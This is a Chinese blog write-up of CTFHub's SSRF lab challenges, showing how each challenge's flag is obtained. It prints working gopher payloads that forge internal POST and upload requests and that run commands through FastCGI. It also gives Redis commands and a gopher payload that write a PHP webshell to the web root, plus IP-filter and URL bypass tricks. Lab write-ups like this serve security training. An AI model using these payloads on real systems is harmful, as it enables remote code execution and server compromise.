CTFHub-SSRF-Writeup

最新推荐文章于 2024-07-24 22:18:51 发布
最新推荐文章于 2024-07-24 22:18:51 发布
阅读量2.8k 收藏
点赞数
分类专栏: CTF 文章标签: 安全 web安全 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuhanzhe/article/details/121948042
版权
本文详细介绍了SSRF漏洞的多种利用方式,包括内网访问、伪协议读取文件、端口扫描、POST请求、文件上传、FastCGI协议、Redis协议、URL Bypass、数字IP Bypass和302跳转Bypass。通过实例展示了如何利用SSRF获取flag,涉及到gopher、file等协议以及DNS重绑定技术。
摘要由CSDN通过智能技术生成

SSRF

在这里插入图片描述

内网访问

直接构造访问请求,获取flag

/?url=127.0.0.1/flag.php

伪协议读取文件

根据题目提示使用file://协议,尝试一般web目录/var/www/html/
在这里插入图片描述

端口扫描

提示端口范围8000到9000

/?url=127.0.0.1:8000

使用burpsuite对端口进行爆破,即可得到端口,访问获取flag

POST请求

访问/?url=127.0.0.1/flag.ph,返回页面
在这里插入图片描述

包含一个form和隐藏的key,推测需要在form中提交key,F12添加提交按钮

<input type="submit" name="sbumit">

在这里插入图片描述

在页面上提交key,页面返回"Just View From 127.0.0.1"
在这里插入图片描述

可见需要通过SSRF提交请求,构造POST请求

  POST /flag.php HTTP/1.1
  Host: 127.0.0.1:80
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 36

  key=99cb8729f8a7ba5dcaa367dc092c2f2c

因为通过SSRF,需要进行两次请求,所以对请求数据进行2次url编码,注意使用CRLF,第一次url编码后需要将%0A替换为%0D%0A,最后得到请求数据

  POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D99cb8729f8a7ba5dcaa367dc092c2f2c

使用gopher发送请求,gopher协议是SSRF中常用的一个协议:

gopher://IP:port/_{TCP/IP数据流}

​ 得到flag
在这里插入图片描述

文件上传

使用file协议查看flag.php,代码检查了上传ip和文件大小,所以需要从127.0.0.1上传非空文件

<?php
error_reporting(0);
if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
  echo "Just View From 127.0.0.1";
  return;
}
if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
  echo getenv("CTFHUB");
  exit;
}
?>
Upload Webshell
<form action="/flag.php" method="post" enctype="multipart/form-data">
  <input type="file" name="file">
</form>

访问/?url=127.0.0.1/flag.php,返回一个文件上传form,根据题意需要提交文件获取flag,F12添加提交按钮
在这里插入图片描述

提交一个随意非空文件,抓取上传数据包,修改host为127.0.0.1:80
在这里插入图片描述

对上传数据进行二次url编码,注意第一次编码后将%0A替换为%0D%0A,得到编码后的请求数据

POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%2520280%250D%250ACache-Control%253A%2520max-age%253D0%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AOrigin%253A%2520http%253A%252F%252Fchallenge-426ad735267eb08d.sandbox.ctfhub.com%253A10800%250D%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D----WebKitFormBoundaryM9A8PenlAkNIPrWa%250D%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64)%2520AppleWebKit%252F537.36%2520(KHTML%252C%2520like%2520Gecko)%2520Chrome%252F92.0.4515.159%2520Safari%252F537.36%250D%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252Cimage%252Favif%252Cimage%252Fwebp%252Cimage%252Fapng%252C*%252F*%253Bq%253D0.8%252Capplication%252Fsigned-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AReferer%253A%2520http%253A%252F%252Fchallenge-426ad735267eb08d.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520UM_distinctid%253D17b2f471020f2e-06f3628e7e7e6e-4343363-1fa400-17b2f47102110f5%250D%250AConnection%253A%2520close%250D%250A%250D%250A------WebKitFormBoundaryM9A8PenlAkNIPrWa%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522123.txt%2522%250D%250AContent-Type%253A%2520text%252Fplain%250D%250A%250D%250A123%250D%250A------WebKitFormBoundaryM9A8PenlAkNIPrWa%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522123%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%250D%250A------WebKitFormBoundaryM9A8PenlAkNIPrWa--

使用gopher发送请求,得到flag
在这里插入图片描述

FastCGI协议

fastcgi相关介绍
gopher payload工具
使用gopherus工具生成payload,运行命令ls /
在这里插入图片描述

进行url编码后得到提交payload

gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH56%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%25008%2504%2500%253C%253Fphp%2520system%2528%2527ls%2520%2F%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

发送请求,获取/下目录情况,发现flag文件
在这里插入图片描述

使用gopherus工具生成payload,运行命令cat /flag_14e0ba551d369f7992793e0b62395dc5
在这里插入图片描述

进行url编码后得到提交payload

gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH94%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%255E%2504%2500%253C%253Fphp%2520system%2528%2527cat%2520%2Fflag_14e0ba551d369f7992793e0b62395dc5%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

发送请求,获得flag
在这里插入图片描述

Redis协议

浅析Redis中SSRF的利用
redis写shell命令如下

flushall
set 1 '<?php eval($_GET["feng"]);?>'
config set dir /var/www/html
config set dbfilename feng.php
save

使用gopherus工具生成redis攻击payload
在这里插入图片描述

进行url编码得到请求payload

gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

请求后生成一句话shell.php文件,利用参数cmd,构造请求/shell.php?cmd=ls%20/
在这里插入图片描述

获取flag文件,再构造请求/shell.php?cmd=cat%20/flag_1d41ab57dcc1507d5d99e103cdca52da,获得flag
在这里插入图片描述

URL Bypasss

访问地址提示"start with http://notfound.ctfhub.com", 所以需要以http://notfound.ctfhub.com开头,构造访问url如下获取flag

/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

题目提示ban掉了127以及172.不能使用点分十进制的IP,但是又要访问127.0.0.1

  • 方法一:
    使用localhost代替127.0.0.1,构造请求url如下,获取flag
/?url=http://localhost/flag.php
  • 方法二:
    将127.0.0.1转换为16进制0x7F000001,构造请求url如下,获取flag
/?url=http://0x7F000001/flag.php

302跳转 Bypass

题目提示过滤了127.0.0.1,使用数字IP Bypass可以绕过,但是题意是使用302跳转绕过,可以生成短链接302跳转获得flag, 短链接生成网站
在这里插入图片描述

DNS重绑定

DNS重绑定漏洞
使用file://协议查看flag.php查看代码发现过滤了/127|172|10|192/开头,可以用16进制方式绕过,但是考虑到题目要求使用DNS重绑定
使用rbndr.us dns rebinding service获取域名
在这里插入图片描述

访问或取flag
在这里插入图片描述

含日
关注
专栏目录
通过ctfhub实操学习ssrf
不想当脚本小子的脚本小子
03-21 674
实战中碰到的SSRF漏洞比较少,刚好在freebuf上看到了一位大佬写的ssrf系统性学习文章(https://www.freebuf.com/articles/web/258365.html)就跟着一起学习一下。 SSRF,服务端请求伪造;一般情况下,SSRF攻击的目标是外网无法连接的内部系统,比如说当我们发现一个web服务器存在ssrf时,而它又连接内网,我们就可以利用这个服务器对内网发出一些请求来获取一些敏感信息,而此时的web服务器就被当作成为跳板使用; SSRF形成的原因是由于服务端提.
CTFHUB-SSRF-FastCGI协议
qq_62078839的博客
04-23 1958
Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 第一种方式 exp import socket import random import argparse import sys from io import BytesIO # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client PY2 = True if sys.version_info.major == 2 el
CTFHub SSRF(服务器请求伪造) WriteUP
tangshuangsss的专栏
08-13 928
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介CTFHub 为网络安全工程师提供网络安全攻防技能培训、实战、技能提升等服务。「赛事中心」提供全网...
CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!
最新发布
2401_85783544的博客
07-24 1151
1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。
CTFHUB SSRF 【全】
Jay17的博客
04-17 1411
CTFHUB SSRF 题解 【全】
CTFHub-SSRF
Dug123456_的博客
04-09 824
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
CTFHubSSRF
qq_45927819的博客
03-28 7136
文章目录伪协议读取文件端口扫描POST请求上传文件 伪协议读取文件 根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体用法请参考: https://www.cnblogs.com/-mo-/p/11673190.html 网站的根目录一般都是在/var/www/html下 使用file:///协议 ?url=file:///var/ww
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 2076
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 4018
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
CTFHUB-WEB-SSRF【11】POST请求 上传文件 FastCGI协议 Redis协议
(∪.∪ )...zzz的博客
06-13 983
!!!POST请求试一下`?url=file:///var/www/html/flag.php`根据提示从127.0.0.1 访问给服务器发送一个KEY,写POST包上传文件FastCGI协议Redis协议 POST请求 试一下?url=file:///var/www/html/flag.php 根据提示从127.0.0.1 访问 给服务器发送一个KEY,写POST包 <!-- Debug: key=a977f452523073d3d7d2fd8bd41b5331--> 这个是基础po
CTFHUB-web-SSRF
ookami6497的博客
03-25 890
CTFHUB-web-ssrf
SSRF - ctfhub - 1【内网访问、伪协议读取、端口扫描、POST详解、上传文件】
bin789456的博客
11-18 2370
写在前面 ssrf无论是生活中还是比赛中都是一种非常常见的漏洞。但一般来说单独考察的较少。后面将从ctfhub和其他平台上来慢慢练习。 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限
CTFHUB SSRF
CN天狼
02-14 1364
CTFHUB SSRF post 上传文件 fastcgi Redis协议 URL Bypass 数字IP Bypass 302跳转 Bypass DNS重绑定 Bypass
CTFHub SSRF
LYJ20010728的博客
08-10 739
CTFHub SSRFSSRF简介漏洞攻击方式CTFHub SSRF靶场第一部分(Http、Dict和file等协议的利用)内网访问伪协议读取文件端口扫描 SSRF简介 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统,也就是说可以利用一个网络请求的服务,当作跳板进行攻击
ctfhub ssrf
shinygod的博客
09-26 544
先用file读一下源码,flag.php中有key且要本地访问,index.php可以传参,可以利用index里的curl用gopher构造post请求,在本地访问flag.php。用gopher写文件,具体原理可以看(https://blog.csdn.net/shinygod/article/details/126995090)的309题。那么直接打:(具体原理可看:https://blog.csdn.net/shinygod/article/details/127034013 的360题)
ctfshow-ssrf writeup
qq_41274349的博客
09-17 1827
ctfshow ssrf 解题指南
CTFHUB - SSRF
m0_64180167的博客
10-05 594
gopher 是个万能协议 用来查看信息我们利用的时候 需要按GET POST 格式写请求包然后通过 一次url编码修改%0a 为 %0d%0a在末尾也要写上 %0d%0a然后再进行一次url编码然后按照 gopher格式gopher://ip:port/_数据流写入即可我们发现 ssrf 我们可以传递 需要的数据包 需要是值 我们就可以传递值 需要是文件我们也可以传递文件。
CTFhub SSRF第一部分
qq_41497476的博客
09-16 821
1.内网访问 提示得很明显 就是要利用ssrf漏洞访问127.0.0.1主机内的flag.php. 在查阅资料的过程中还发现了其他的绕过写法,加上这些特殊符号后对结果无影响 2.伪协议读取文件 强调了Web目录,那明显就是要用到绝对路径,file协议是用绝对路径访问本地文件的协议。 Linux系统下,网站路径是 /var/www/html/… 利用该路径去获得flag文件 看一下对比 file协议是引入绝对路径,但不理解为什么用127.0.0.1直接包含的flag.php跟用file协议绝对路径包
ctfhub--ssrf
qq_44418229的博客
06-10 1071
ctfhub----ssrf笔记
CTFHub ssrf
07-29
所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值